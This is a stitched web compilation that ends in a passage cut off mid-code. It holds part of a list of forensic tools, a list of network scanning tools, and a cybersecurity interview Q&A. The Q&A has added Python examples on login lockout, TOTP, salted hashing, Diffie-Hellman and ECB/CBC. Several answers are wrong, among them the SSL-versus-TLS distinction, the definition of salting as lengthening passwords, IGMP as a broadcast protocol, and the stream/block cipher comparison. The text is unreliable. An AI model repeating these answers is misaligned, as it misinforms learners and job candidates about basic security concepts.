Wireshark is a network packet analyzer. It can be used for network testing and troubleshooting. This tool helps you to inspect the different kinds of traffic going through your computer system.

Features:

  • It provides rich VoIP (Voice over Internet Protocol) analysis.

  • Capture files compressed with gzip can be decompressed easily.

  • Output can be exported to XML (Extensible Markup Language), CSV (Comma Separated Values) file, or plain text.

  • Live data can be read from the network, blue-tooth, ATM, USB, etc.

  • Decryption support for numerous protocols that include IPsec (Internet Protocol Security), SSL/TLS (Secure Sockets Layer / Transport Layer Security), and WEP (Wired Equivalent Privacy).

  • You can apply intuitive analysis and coloring rules to packets.

  • Reads and writes many capture file formats, including pcap and pcapng.

Link: https://www.wireshark.org


11) Registry Recon

Registry Recon is a computer forensics tool used to extract, recover, and analyze registry data from Windows OS. This program can be used to efficiently determine external devices that have been connected to any PC.

Features:

  • It supports Windows XP, Vista, 7, 8, 10, and other operating systems.

  • This tool automatically recovers valuable NTFS data.

  • You can integrate it with the Microsoft Disk Manager utility tool.

  • Quickly mounts all VSCs (Volume Shadow Copies) within a disk.

  • This program rebuilds the active registry database.

Link: https://arsenalrecon.com/products/


12) Volatility Framework

Volatility Framework is open-source software for memory analysis and forensics. It helps you to examine the runtime state of a system using the data found in RAM. This app allows you to collaborate with your teammates.

Features:

  • It has an API that allows quick lookups of PTE (Page Table Entry) flags.

  • Volatility Framework supports KASLR (Kernel Address Space Layout Randomization).

  • This tool provides numerous plugins for checking Mac file operation.

  • It automatically runs Failure command when a service fails to start multiple times.

Link: https://www.volatilityfoundation.org


13) Xplico

Xplico is an open-source forensic analysis app. It supports HTTP( Hypertext Transfer Protocol), IMAP (Internet Message Access Protocol), and more.

Features:

  • You can get your output data in the SQLite database or MySQL database.

  • This tool gives you real time collaboration.

  • No size limit on data entry or the number of files.

  • You can easily create any kind of dispatcher to organize the extracted data in a useful way.

  • It supports both IPv4 and IPv6.

  • You can perform reverse DNS lookups using the DNS packets contained in the input files.

  • Xplico provides PIPI (Port Independent Protocol Identification) feature to support digital forensic.

Link: https://www.xplico.org


14) e-fense

E-fense is a tool that helps you to meet your computer forensics and cybersecurity needs. It allows you to discover files from any device in one simple to use interface.

Features:

  • It gives protection from malicious behavior, hacking, and policy violations.

  • You can acquire internet history, memory, and screen capture from a system onto a USB thumb drive.

  • This tool has a simple to use interface that enables you to achieve your investigation goal.

  • E-fense supports multithreading, that means you can execute more than one thread simultaneously.

Link: http://www.e-fense.com/products.php


15) Crowdstrike

Crowdstrike is digital forensic software that provides threat intelligence, endpoint security, etc. It can quickly detect and recover from cybersecurity incidents. You can use this tool to find and block attackers in real time.

Features:

  • This tool helps you to manage system vulnerabilities.

  • It can automatically analyze malware.

  • You can secure your virtual, physical, and cloud-based data center.

Link: https://www.crowdstrike.com/endpoint-security-products/falcon-endpoint-protection-pro/

 


17 Best IP & Network Scanning Tools in 2020 (Free/Paid)

IP and network scanning tools are software that discover hosts and services on a network, identify weaknesses, and flag abnormal behavior that poses a threat to the system. They provide a convenient way to secure your computer network.

Following is a handpicked list of Top IP Scanners, with its popular features and website links. The list contains both open source(free) and commercial(paid) software.

1) Skyboxsecurity

Skyboxsecurity provides you seamless network visibility across IT, multi-cloud, and physical environments. This tool is designed to support complex enterprise and large networks.

Features:

  • This tool helps you to interact with a model of network topology, security controls, and assets.

  • Solve network connectivity related issues and find the root causes of network outages to ensure business continuity and continuous uptime.

  • You can keep security zones and device configurations in continuous compliance.

Link: https://www.skyboxsecurity.com/


2) Thousandeyes

ThousandEyes networking monitoring software allows you to find the cause of problems anywhere. It monitors network infrastructure, troubleshoots application delivery, and maps Internet performance.

Features:

  • Visualize multiple layers of network data to check diverse infrastructure, services, and apps

  • You can See app delivery across every network.

  • Integrate data directly into your existing workflows and systems.

  • Rapidly diagnose, triage, and find problems with real-time performance data.

  • You can collaborate with your service providers by sharing interactive data sets.

Link: https://www.thousandeyes.com/network-intelligence


3) Beyondtrust

BeyondTrust offers a network vulnerability scanner that finds configuration issues and missing patches across applications, devices, virtual environments, and operating systems.

Features:

  • This tool has a user-friendly interface that simplifies integrations and enhances the productivity of your business.

  • It provides patch management.

  • Improve risk management and prioritization.

  • The tool provides support for VMware that includes virtual image scanning.

  • It allows you to integrate with vCenter and scan virtual applications for security.

Link: https://www.beyondtrust.com/


4) Qualys

Qualys helps businesses streamline their security and compliance solutions. It also builds security into their digital transformation initiatives. This tool can also check the performance of the online cloud systems.

Features:

  • Data are securely stored and processed on an n-tiered architecture of load-balanced servers.

  • You do not require hardware to install and manage data.

  • It is a scalable, end-to-end solution for all aspects of IT security.

  • Qualys analyzes data in real time.

  • It can respond to threats in real-time.

Link: https://www.qualys.com/


5) Paessler

Paessler PRTG is a network monitoring tool with advanced infrastructure management capability. This software helps you to monitor IT infrastructure using technologies like SNMP, WMI, packet sniffing, REST APIs, SQL, and others.

Features:

  • You can get the numbers, statistics, and graphs for the data you are going to monitor or configuration.

  • It has automated failover handling.

  • The tool provides Multiple user web interfaces.

  • You can visualize your network using maps.

  • Paessler allows you to monitor networks in various locations.

  • It provides alerts via email, plays alarm audio files, or triggering HTTP requests.

  • You can monitor jFlow, sFlow, IP SLA, Firewall, IP, LAN, Wi-Fi, Jitter, and IPFIX.

Link: https://www.paessler.com/network_monitoring_tool


6) Spiceworks

Spiceworks is an easy to use network monitoring tool which offers real-time status and alerts for your critical devices.

Features:

  • It is simple and easy to install.

  • You can adjust alert thresholds for in-app notifications or emails.

  • Support is entirely free, whether online, by phone, or by chat.

  • Get quick insights and spot slow, sluggish, or overwhelmed systems.

Link: https://www.spiceworks.com/download/monitor/


7) Site24x7

Site24x7 is an integrated tool for cloud monitoring, website performance, application, and server monitoring tool. It is designed especially for IT and DevOps to enhance user experiences when accessing websites from various devices.

Features:

  • It automatically searches all the devices available within a provided IP range.

  • Supports more than 200 vendors, including Canon, Cisco, HP, Dell.

  • You can configure network devices to send SNMP alert message.

  • It has 4000+ customizable device templates.

  • You can see top devices based on response time and packet loss.

  • This tool automates mapping with Layer 2 maps.

Link: https://www.site24x7.com/tools.html


8) Nagios

Nagios is an open-source software product for continuous monitoring. It enables you to analyze networks, infrastructure, and systems. It is used for continuous monitoring of systems, applications, services, and business processes in a DevOps culture.

Features:

  • It helps you to define network host hierarchy using parent hosts.

  • This tool automatically sends alerts if the condition changes.

  • Nagios enables you to read its configuration from an entire directory, which helps you to decide how to define individual files.

  • It supports for implementing redundant monitoring hosts.

  • You can monitor network protocols like HTTP, SMTP, POP, SSH, FTP, etc.

  • This tool offers your network a high degree of scalability, and visibility helping you to solve issues related to multiple networks.

Link: https://www.nagios.org/


9) Nessus

Nessus is a vulnerability scanner for checking compliance, searching for sensitive data, and scanning IP ranges and web servers. This application is designed to make network scanning easy and intuitive.

Features:

  • You can secure your cloud, OT (Operational Technology) devices, and traditional IT assets.

  • The tool provides complete network scanning with unlimited assessments.

  • It offers accurate visibility into your computer network.

  • Supports many plugins that deliver timely protection from new threats.

  • It enables you to migrate to reliable solutions safely.

  • Includes web application checks for flaws such as SQL injection.

Link: https://www.tenable.com/products/nessus


10) GFI Software

GFI Software (GFI LanGuard) allows you to scan your mobile devices and computer network for vulnerabilities. It provides patch management for Windows, Linux, and macOS.

Features:

  • It provides patch management for third-party applications as well as the operating system.

  • Web reporting console

  • Track latest network problem and missing updates

  • Integration with security applications

  • Support for Virtual Environments

Link: https://www.gfi.com/products-and-solutions/network-security-solutions


11) Advanced IP Scanner

Advanced IP Scanner is a free application that discovers hosts on a LAN, lets you open their shared folders, remotely control computers, and even power PCs on (via Wake-on-LAN) and off.

Features:

  • Use this software without installing it.

  • This tool detects MAC addresses.

  • You can export the scanned result to CSV file.

  • It provides remote control via remote desktop protocol.

  • You can turn on or off any computer remotely.

  • You can easily open shared network folders.

Link: http://www.advanced-ip-scanner.com/


12) Domotz

Domotz is a tool that analyzes advanced network data and helps you to manage remote networks. This application can troubleshoot multiple networks and helps prevent technology-related issues.

Features:

  • It allows you to monitor any type and number of devices.

  • This software automatically discovers devices on the network.

  • It monitors a range of events and device attributes and provides alerts.

  • It provides on-demand and scheduled speed tests.

  • Domotz gives up to date reporting on data like WiFi signal level, noise value reporting, and health measures.

  • You can connect your device remotely and resolve issues.

Link: https://www.domotz.com/features.php


13) Essential NetTools

Essential NetTools is a collection of network scanning, administration, and security tools. These tools help you to find active network ports within a specific range of IP addresses.

Features:

  • It displays PC's network connections, including the information on UDP, and open TCP ports.

  • You can scan a network within a given range of IP addresses.

  • It monitors and logs external connections to your PC's shared resources.

  • It allows you to perform many security checks on your network and individual computers.

  • It automatically checks if a host computer is alive and running network services.

  • Essential NetTools displays the list of running processes with necessary details on the manufacturer, process ID, and program location.

Link: https://www.tamos.com/download/main/


14) Logicmonitor

LogicMonitor traces your applications' predefined data sources to monitor, graph, and alert you about all the trends and events in a single resource for effective application management.

Features:

  • You can work with Windows or Linux operating systems.

  • Get alerts from any browser.

  • This tool provides email, phone, and SMS alerts.

  • Alert routing to notify specific groups.

  • It offers performance graphs.

  • You can manage users according to the role.

Link: https://www.logicmonitor.com/network-monitoring/


15) Nikto2

Nikto scans web servers for more than 7000 potentially dangerous files and programs. This tool also identifies server configuration items, such as the presence of multiple index files and HTTP server options.

Features:

  • It provides HTTP proxy support

  • The tool automatically searches outdated server components.

  • You can save reports in plain text, HTML, XML, NBE, or CSV.

  • It provides a template engine for report customization.

  • It allows you to scan multiple servers and ports.

  • Host authentication with Basic and NTLM.

  • Authorization guessing handles any directory.

Link: https://cirt.net/Nikto2


16) SoftPerfect Network Scanner

Features:

  • It supports both IPV4 and IPV6.

  • SoftPerfect network scanner detects hardware MAC-addresses and internal or external IP addresses.

  • You can get system information via remote registry, WMI (Windows Management Instrumentation) file system, and service manager.

  • Scan for TCP ports, UDP, and SNMP services.

  • It enables you to export result to XML JSON, HTML, TXT, and CSV format.

  • This software can be run from a USB flash drive without setup.

Link: https://www.softperfect.com/products/networkscanner/


17) Rapid7

Rapid7 Nexpose monitors your network in real time and finds new threats. It collects data from your assets and makes it easy for you to manage malicious activity.

Features:

  • It provides a real time view of risk.

  • This tool provides the necessary details to fix any network issues.

  • It automatically detects and assesses new devices

  • You can integrate it with the Metasploit penetration testing framework.

Link: https://www.rapid7.com/products/nexpose/

Top 110 Cyber Security Interview Questions & Answers

Following are frequently asked questions in interviews for freshers as well as experienced cyber security certification candidates.

1) What is cybersecurity?

Cybersecurity refers to the protection of hardware, software, and data from attackers. The primary purpose of cyber security is to protect against cyberattacks like accessing, changing, or destroying sensitive information.

2) What are the elements of cybersecurity?

Major elements of cybersecurity are:

  • Information security

  • Network security

  • Operational security

  • Application security

  • End-user education

  • Business continuity planning

3) What are the advantages of cyber security?

Benefits of cyber security are as follows:

  • It protects the business against ransomware, malware, social engineering, and phishing.

  • It protects end-users.

  • It gives good protection for both data as well as networks.

  • Reduces recovery time after a breach.

  • Cybersecurity prevents unauthorized access.

4) Define Cryptography.

It is a technique used to protect information from third parties called adversaries. Cryptography ensures that only the sender and the intended recipient of a message can read its contents.

5) Differentiate between IDS and IPS.

An Intrusion Detection System (IDS) detects intrusions and raises an alert; acting on that alert is left to the administrator. An Intrusion Prevention System (IPS) sits inline in the traffic path, so when it finds an intrusion it blocks it itself.

6) What is CIA?

Confidentiality, Integrity, and Availability (CIA) is a popular model used to design a security policy. The CIA model consists of three concepts:

  • Confidentiality: Ensure that sensitive data is accessed only by authorized users.

  • Integrity: Ensure that data is not altered or destroyed by unauthorized parties, so it remains accurate and trustworthy.

  • Availability: Ensure the data and resources are available to the users who need them.

7) What is a Firewall?

It is a security system designed for the network. A firewall is placed at the boundary of a system or network, where it monitors and controls network traffic according to a set of rules. Firewalls are mostly used to protect the system or network from malware, worms, and viruses. Firewalls can also perform content filtering and restrict remote access.

8) Explain Traceroute

It is a tool that shows the path a packet takes. It lists all the points that the packet passes through. Traceroute is used mostly when a packet does not reach its destination: it is used to check where the connection breaks or stops, and to identify the point of failure.

9) Differentiate between HIDS and NIDS.

Parameter        | HIDS                                                                       | NIDS
-----------------|----------------------------------------------------------------------------|-------------------------------------------------------
Usage            | HIDS is used to detect the intrusions.                                     | NIDS is used for the network.
What does it do? | It monitors suspicious system activities and traffic of a specific device. | It monitors the traffic of all devices on the network.

10) Explain SSL

SSL stands for Secure Sockets Layer. It is a technology creating encrypted connections between a web server and a web browser. It is used to protect the information in online transactions and digital payments to maintain data privacy.

11) What do you mean by data leakage?

Data leakage is an unauthorized transfer of data to the outside world. Data leakage occurs via email, optical media, laptops, and USB keys.

12) Explain the brute force attack. How to prevent it?

It is a trial-and-error method to find out the right password or PIN. Attackers repetitively try all combinations of credentials. In many cases, brute force attacks are automated, where software automatically attempts to log in with the credentials. There are ways to prevent brute force attacks. They are:

  • Set a minimum password length.

  • Increase password complexity.

  • Set a limit on login failures.
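The three controls above, combined in one small server-side component, as an added example that is not part of the original page. It assumes a password policy of 12 characters with three character classes, a lockout of five consecutive failures for fifteen minutes, and a pluggable password check; the credential store and the clock are constructed for the demo.

```python
import hmac
import time

MAX_FAILURES = 5             # consecutive failures before lockout (assumed policy value)
LOCKOUT_SECONDS = 15 * 60    # lock duration (assumed policy value)
MIN_PASSWORD_LENGTH = 12     # minimum length enforced when a password is set (assumed)


def password_is_acceptable(password):
    """Length plus complexity: at least three of lower, upper, digit, symbol."""
    if len(password) < MIN_PASSWORD_LENGTH:
        return False
    classes = (any(c.islower() for c in password),
               any(c.isupper() for c in password),
               any(c.isdigit() for c in password),
               any(not c.isalnum() for c in password))
    return sum(classes) >= 3


class LoginThrottle:
    """Counts consecutive failures per account and locks the account for a while.
    Unknown users and wrong passwords get the same answer, so the response does
    not confirm which usernames exist."""

    def __init__(self, check_password, clock=time.time):
        self.check_password = check_password   # callable(username, password) -> bool
        self.clock = clock                      # injectable so tests can move time
        self.failures = {}                      # username -> consecutive failures
        self.locked_until = {}                  # username -> unix time the lock expires

    def attempt(self, username, password):
        now = self.clock()
        if now < self.locked_until.get(username, 0):
            return "locked"
        if self.check_password(username, password):
            self.failures.pop(username, None)
            return "ok"
        count = self.failures.get(username, 0) + 1
        if count >= MAX_FAILURES:
            self.locked_until[username] = now + LOCKOUT_SECONDS
            self.failures.pop(username, None)
            return "locked"
        self.failures[username] = count
        return "denied"


def demo():
    """Constructed credential store and a fake clock so the lockout can be observed."""
    store = {"alice": "correct horse battery staple!1"}   # constructed; real stores keep salted hashes
    fake_now = {"t": 1_000_000.0}

    def check(username, password):
        expected = store.get(username, "")
        return hmac.compare_digest(expected.encode(), password.encode())

    throttle = LoginThrottle(check, clock=lambda: fake_now["t"])
    results = [throttle.attempt("alice", "guess-%d" % i) for i in range(MAX_FAILURES)]
    results.append(throttle.attempt("alice", store["alice"]))   # right password, still locked
    fake_now["t"] += LOCKOUT_SECONDS + 1
    results.append(throttle.attempt("alice", store["alice"]))   # lock has expired
    return results
```

A per-account lockout on its own lets anyone lock a victim out by guessing badly on purpose, so in practice it is paired with per-source rate limiting and alerting on bursts of failures rather than used alone.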

13) What is port scanning?

It is the technique for identifying open ports and the services available on a specific host. Attackers use the port scanning technique to gather information for malicious purposes.

14) Name the different layers of the OSI model.

The seven layers of the OSI model are as follows:

  1. Physical Layer

  2. Data Link Layer

  3. Network Layer

  4. Transport Layer

  5. Session Layer

  6. Presentation Layer

  7. Application Layer

15) What is a VPN?

VPN stands for Virtual Private Network. It is a network connection method for creating an encrypted and safe connection. This method protects data from interference, snooping, and censorship.

16) What are black hat hackers?

Black hat hackers are people who have a good knowledge of breaching network security. These hackers can create malware for personal financial gain or other malicious reasons. They break into a secure network to modify, steal, or destroy data so that the network cannot be used by authorized network users.

17) What are white hat hackers?

White hat hackers, or security specialists, are specialized in penetration testing. They protect the information systems of an organization.

18) What are grey hat hackers?

Grey hat hackers are computer hackers who sometimes violate ethical standards, but they do not have malicious intent.

19) How to reset a password-protected BIOS configuration?

There are various ways to reset a BIOS password. Some of them are as follows:

  • Remove the CMOS battery.

  • By utilizing software.

  • By utilizing a motherboard jumper.

  • By utilizing MS-DOS.

20) What is MITM attack?

A MITM, or Man-in-the-Middle, is a type of attack where an attacker intercepts the communication between two parties. The main intention of MITM is to access confidential information.

21) Define ARP and its working process.

It is a protocol used for finding the MAC address associated with an IPv4 address. This protocol works as an interface between the OSI network layer and the OSI link layer.

22) Explain botnet.

It's a number of internet-connected devices like servers, mobile devices, IoT devices, and PCs that are infected and controlled by malware.

23) What is the main difference between SSL and TLS?

The main difference between these two is that SSL verifies the identity of the sender. SSL helps you to track the person you are communicating with. TLS offers a secure channel between two clients.

24) What is the abbreviation of CSRF?

CSRF stands for Cross-Site Request Forgery.

25) What is 2FA? How to implement it for a public website?

2FA stands for Two-Factor Authentication. It is a security process to identify the person who is accessing an online account. The user is granted access only after presenting evidence to the authentication device.
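The second factor most public websites implement is a time-based one-time password (TOTP, RFC 6238) from an authenticator app. Below is an added example, not code from the original page, of the server side: code generation, verification with a small clock-drift window, and a record of the last accepted time step so that a captured code cannot be replayed. The 30-second step and the one-step window are the RFC defaults; the user name and the secret used in the demo are the RFC 6238 test key, embedded here as constructed input.

```python
import hashlib
import hmac
import struct
import time

STEP_SECONDS = 30   # time step length from RFC 6238


def hotp(secret, counter, digits=6):
    """HOTP (RFC 4226): HMAC-SHA1 over the 8-byte counter, dynamic truncation,
    then reduce modulo 10^digits and left-pad with zeros."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, for_time=None, digits=6):
    """TOTP (RFC 6238): HOTP with the counter derived from Unix time."""
    if for_time is None:
        for_time = time.time()
    return hotp(secret, int(for_time) // STEP_SECONDS, digits)


class TotpVerifier:
    """Server side of the second factor: holds each user's secret and the last
    time-step counter it accepted, so a code that was already used is rejected."""

    def __init__(self, window=1):
        self.window = window          # steps of clock drift tolerated either side
        self.secrets = {}             # user -> shared secret (constructed store)
        self.last_counter = {}        # user -> last accepted counter

    def enrol(self, user, secret):
        # On a real site the secret comes from secrets.token_bytes(20), is shown
        # once as a QR code, and is stored encrypted at rest.
        self.secrets[user] = secret

    def check(self, user, submitted, for_time=None):
        secret = self.secrets.get(user)
        if secret is None:
            return False
        if for_time is None:
            for_time = time.time()
        counter = int(for_time) // STEP_SECONDS
        for delta in range(-self.window, self.window + 1):
            c = counter + delta
            if c <= self.last_counter.get(user, -1):
                continue      # a code for this step (or an earlier one) was already used
            if hmac.compare_digest(hotp(secret, c), submitted):
                self.last_counter[user] = c
                return True
        return False
```

The verifier only runs after the first factor (the password) has succeeded, and the TOTP check itself should sit behind the same failure limits as the password, since a six-digit code is small enough to guess if unlimited attempts are allowed.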

26) Explain the difference between asymmetric and symmetric encryption.

Symmetric encryption requires the same key for encryption and decryption. On the other hand, asymmetric encryption needs different keys for encryption and decryption.

27) What is the full form of XSS?

XSS stands for cross-site scripting.

28) Explain WAF

WAF stands for Web Application Firewall. A WAF is used to protect the application by filtering and monitoring incoming and outgoing traffic between a web application and the internet.

29) What is hacking?

Hacking is a process of finding weaknesses in computers or private networks and exploiting those weaknesses to gain access.

For example, using password cracking technique to gain access to a system.

30) Who are hackers?

A Hacker is a person who finds and exploits the weaknesses in computer systems, smartphones, tablets, or networks to gain access. Hackers are well-experienced computer programmers with knowledge of computer security.

31) What is network sniffing?

Network sniffing is a tool used for analyzing data packets sent over a network. This can be done by a specialized software program or by hardware equipment. Sniffing can be used to:

  • Capture sensitive data such as passwords.

  • Eavesdrop on chat messages.

  • Monitor data packets over a network.

32) What is the importance of DNS monitoring?

Young domains are easily infected with malicious software. You need to use DNS monitoring tools to identify malware.

33) Define the process of salting. What is the use of salting?

Salting is the process of extending the length of passwords by using special characters. To use salting, it is very important to know the entire mechanism of salting. The use of salting is to safeguard passwords. It also prevents attackers from testing known words across the system.

For example, the string "QxLUF1bgIAdeQX" is added to each and every password before it is hashed, to protect the password. This string is called the salt.
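An added example, not from the original page, of what the salt buys in practice: a per-user random salt is combined with the password inside a slow key-derivation function, so two users with the same password store different digests and a precomputed table of hashed common words no longer matches. PBKDF2-HMAC-SHA256 from the standard library is used here; the iteration count and the word list are assumptions made for the demo.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000   # PBKDF2 work factor; assumed for the demo, tune higher in production
WORDLIST = ["letmein", "password123", "qwerty"]   # constructed stand-in for a cracking wordlist


def hash_password(password, salt=None):
    """Return (salt, digest). A fresh 16-byte random salt is drawn for every password."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password, salt, digest):
    """Re-derive with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


def unsalted_lookup(stored_digest):
    """One precomputed table serves every account when no salt is used."""
    table = {hashlib.sha256(w.encode()).digest(): w for w in WORDLIST}
    return table.get(stored_digest)


def unsalted_demo():
    stored = hashlib.sha256(b"password123").digest()   # what an unsalted system would keep
    return unsalted_lookup(stored)                      # recovered with a single lookup


def salted_demo():
    """Same password, two users, two salts: two different digests, both still verifiable."""
    s1, d1 = hash_password("password123")
    s2, d2 = hash_password("password123")
    return {
        "digests_differ": d1 != d2,
        "verify_ok": verify_password("password123", s1, d1)
                     and verify_password("password123", s2, d2),
        "wrong_rejected": not verify_password("Password123", s1, d1),
    }
```

The salt is stored next to the digest in the clear; its job is not secrecy but uniqueness, which forces an attacker to repeat the slow derivation separately for every account.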

34) What is SSH?

SSH stands for Secure Socket Shell or Secure Shell. It is a utility suite that provides system administrators a secure way to access data on a network.

35) Is SSL protocol enough for network security?

SSL verifies the sender's identity, but it does not provide security once the data is transferred to the server. It is good to use server-side encryption and hashing to protect the server against a data breach.

36) What is black box testing and white box testing?

  • Black box testing: It is a software testing method in which the internal structure or program code is hidden from the tester.

  • White box testing: A software testing method in which the internal structure or program code is known to the tester.

37) Explain vulnerabilities in network security.

Vulnerabilities refer to the weak point in software code which can be exploited by a threat actor. They are most commonly found in an application like SaaS (Software as a service) software.

38) Explain TCP Three-way handshake.

It is a process used in a network to make a connection between a local host and server. This method requires the client and server to negotiate synchronization and acknowledgment packets before starting communication.

39) Define the term residual risk. What are three ways to deal with risk?

It is the risk that remains after threats have been found and eliminated.

Three ways to deal with risk are:

  1. Reduce it

  2. Avoid it

  3. Accept it.

40) Define Exfiltration.

Data exfiltration refers to the unauthorized transfer of data from a computer system. This transmission may be manual and carried out by anyone having physical access to a computer.

41) What is exploit in network security?

An exploit is a method utilized by hackers to access data in an unauthorized way. It is incorporated into malware.

42) What do you mean by penetration testing?

It is the process of checking exploitable vulnerabilities on the target. In web security, it is used to augment the web application firewall.

43) List out some of the common cyber-attack.

Following are the common cyber-attacks which can be used by hackers to damage a network:

  • Malware

  • Phishing

  • Password attacks

  • DDoS

  • Man in the middle

  • Drive-by downloads

  • Malvertising

  • Rogue software

44) How to make the user authentication process more secure?

In order to authenticate users, they have to provide their identity. The ID and key can be used to confirm the user's identity. This is the ideal way for the system to authorize the user.

45) Explain the concept of cross-site scripting.

Cross-site scripting refers to a network security vulnerability in which malicious scripts are injected into websites. This attack occurs when attackers allow an untrusted source to inject code into a web application.

46) Name the protocol that broadcast the information across all the devices.

Internet Group Management Protocol, or IGMP, is a communication protocol that is used in gaming or video streaming. It facilitates routers and other communication devices to send packets.

47) How to protect email messages?

Use a cipher algorithm to protect email, credit card information, and corporate data.

48) What are the risks associated with public Wi-Fi?

Public Wi-Fi has many security issues. Wi-Fi attacks include the karma attack, sniffing, war-driving, brute force attacks, etc.

Public Wi-Fi may expose data that is passed through a network device, like emails, browsing history, passwords, and credit card data.

49) What is Data Encryption? Why it is important in network security?

Data encryption is a technique in which the sender converts the message into a code. It allows only authorized users to gain access.

50) Explain the main difference between Diffie-Hellman and RSA.

Diffie-Hellman is a protocol used for exchanging keys between two parties, while RSA is an algorithm that works on the basis of two keys called the private and public key.

51) What is a remote desktop protocol?

Remote Desktop Protocol (RDP) is developed by Microsoft and provides a GUI to connect two devices over a network.

The user uses RDP client software for this purpose, while the other device must run RDP server software. This protocol is specifically designed for remote management and for access to virtual PCs, applications, and terminal servers.

52) Define Forward Secrecy.

Forward Secrecy is a security measure that ensures the integrity of a unique session key in the event that a long-term key is compromised.
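A worked Diffie-Hellman exchange, as an added example that is not part of the original page, tying question 50 (how the two parties agree on a key) to question 52 (why fresh keys per session give forward secrecy). The group is an assumption chosen so the demo runs in pure Python: p = 2^521 - 1 (a Mersenne prime) with generator 3, a toy stand-in; real deployments use a standard group from RFC 7919 or an elliptic-curve exchange such as X25519.

```python
import hashlib
import secrets

# Toy group, assumed for illustration only: p = 2^521 - 1 is prime, g = 3.
P = 2 ** 521 - 1
G = 3


def keypair():
    """Private exponent a in [1, p-2] and public value g^a mod p."""
    priv = secrets.randbelow(P - 2) + 1
    return priv, pow(G, priv, P)


def shared_secret(priv, peer_pub):
    """g^(ab) mod p, computed by each side from its own private value and the peer's public one."""
    if not 1 < peer_pub < P - 1:      # reject 0, 1 and p-1, which force a trivial secret
        raise ValueError("invalid peer public value")
    return pow(peer_pub, priv, P)


def derive_key(secret):
    """Hash the raw group element into a fixed-size session key."""
    return hashlib.sha256(secret.to_bytes((P.bit_length() + 7) // 8, "big")).digest()


def run_session(alice_key, bob_key):
    """One exchange: Alice sends a_pub, Bob sends b_pub, both derive the same key."""
    a_priv, a_pub = alice_key
    b_priv, b_pub = bob_key
    k_alice = derive_key(shared_secret(a_priv, b_pub))
    k_bob = derive_key(shared_secret(b_priv, a_pub))
    assert k_alice == k_bob          # the two sides agree without ever sending the key
    return k_alice


def static_dh_sessions(n=3):
    """Both parties reuse one long-term keypair: every session key is identical, so a
    later compromise of either private key exposes every recorded session."""
    alice, bob = keypair(), keypair()
    return [run_session(alice, bob) for _ in range(n)]


def ephemeral_dh_sessions(n=3):
    """Fresh keypairs per session (forward secrecy): keys differ, and the private
    exponents are dropped after use, so no long-term secret can recreate past keys."""
    return [run_session(keypair(), keypair()) for _ in range(n)]
```

In a real protocol the ephemeral public values are signed with a long-term key (for example an RSA certificate key) so the peer knows who it is talking to; that signing key only authenticates, it never protects the session keys, which is exactly why its later compromise does not undo forward secrecy.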

53) Explain the concept of IV in encryption.

IV stands for initialization vector. It is an arbitrary number that is used to ensure that identical plaintext is encrypted to different ciphertexts. The encryption program uses this number only once per session.

54) Explain the difference between stream cipher and block cipher.

Parameter         | Stream Cipher                                    | Block Cipher
------------------|--------------------------------------------------|--------------------------------------------
How does it work? | Stream cipher operates on small plaintext units. | Block cipher works on large data blocks.
Code requirement  | It requires less code.                           | It requires more code.
Usage of key      | Key is used only once.                           | Reuse of key is possible.
Application       | Secure Socket Layer.                             | File encryption and database.
Usage             | Stream cipher is used to implement hardware.     | Block cipher is used to implement software.

55) Give some examples of a symmetric encryption algorithm.

Following are some examples of symmetric encryption algorithms.

  • RCx

  • Blowfish

  • Rijndael (AES)

  • DES

56) What is the abbreviation of ECB and CBC?

The full form of ECB is Electronic Codebook, and the full form of CBC is Cipher Block Chaining.
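An added example, not from the original page, that makes questions 53 and 56 concrete: the same two-block message encrypted in ECB mode shows a repeated ciphertext block, CBC with a fresh IV hides the repeat, and reusing one IV for two CBC encryptions of the same message produces identical ciphertext. The block cipher itself is an assumption: a 4-round Feistel construction built from HMAC-SHA256 so the code runs without a crypto library; it is a teaching stand-in, not AES, and the modes, padding and demo message are likewise constructed here.

```python
import hashlib
import hmac
import os

BLOCK = 16    # block size in bytes
ROUNDS = 4


def _round(key, i, half):
    """Round function: keyed PRF of (round number, right half), truncated to 8 bytes."""
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def _feistel(key, block, order):
    left, right = block[:8], block[8:]
    for i in order:
        f = _round(key, i, right)
        left, right = right, bytes(a ^ b for a, b in zip(left, f))
    return right + left          # final swap makes decryption the same walk in reverse


def block_encrypt(key, block):
    """Toy Feistel block cipher (assumed, not AES): 16-byte block in, 16-byte block out."""
    return _feistel(key, block, range(ROUNDS))


def block_decrypt(key, block):
    return _feistel(key, block, reversed(range(ROUNDS)))


def pad(data):
    n = BLOCK - len(data) % BLOCK          # PKCS#7: always add 1..16 bytes
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def ecb_encrypt(key, plaintext):
    """Electronic Codebook: each block encrypted independently; equal blocks stay equal."""
    pt = pad(plaintext)
    return b"".join(block_encrypt(key, pt[i:i + BLOCK]) for i in range(0, len(pt), BLOCK))


def cbc_encrypt(key, iv, plaintext):
    """Cipher Block Chaining: each block is XORed with the previous ciphertext (IV first)."""
    pt = pad(plaintext)
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, bytes(a ^ b for a, b in zip(pt[i:i + BLOCK], prev)))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out.append(bytes(a ^ b for a, b in zip(block_decrypt(key, c), prev)))
        prev = c
    return unpad(b"".join(out))


def demo():
    key = b"constructed-demo-key"
    message = b"ATTACK AT DAWN!!" * 2          # constructed: two identical 16-byte blocks
    ecb = ecb_encrypt(key, message)
    iv1, iv2 = os.urandom(BLOCK), os.urandom(BLOCK)
    cbc_a = cbc_encrypt(key, iv1, message)
    cbc_b = cbc_encrypt(key, iv1, message)    # IV reused for the same message
    cbc_c = cbc_encrypt(key, iv2, message)    # fresh IV
    return {
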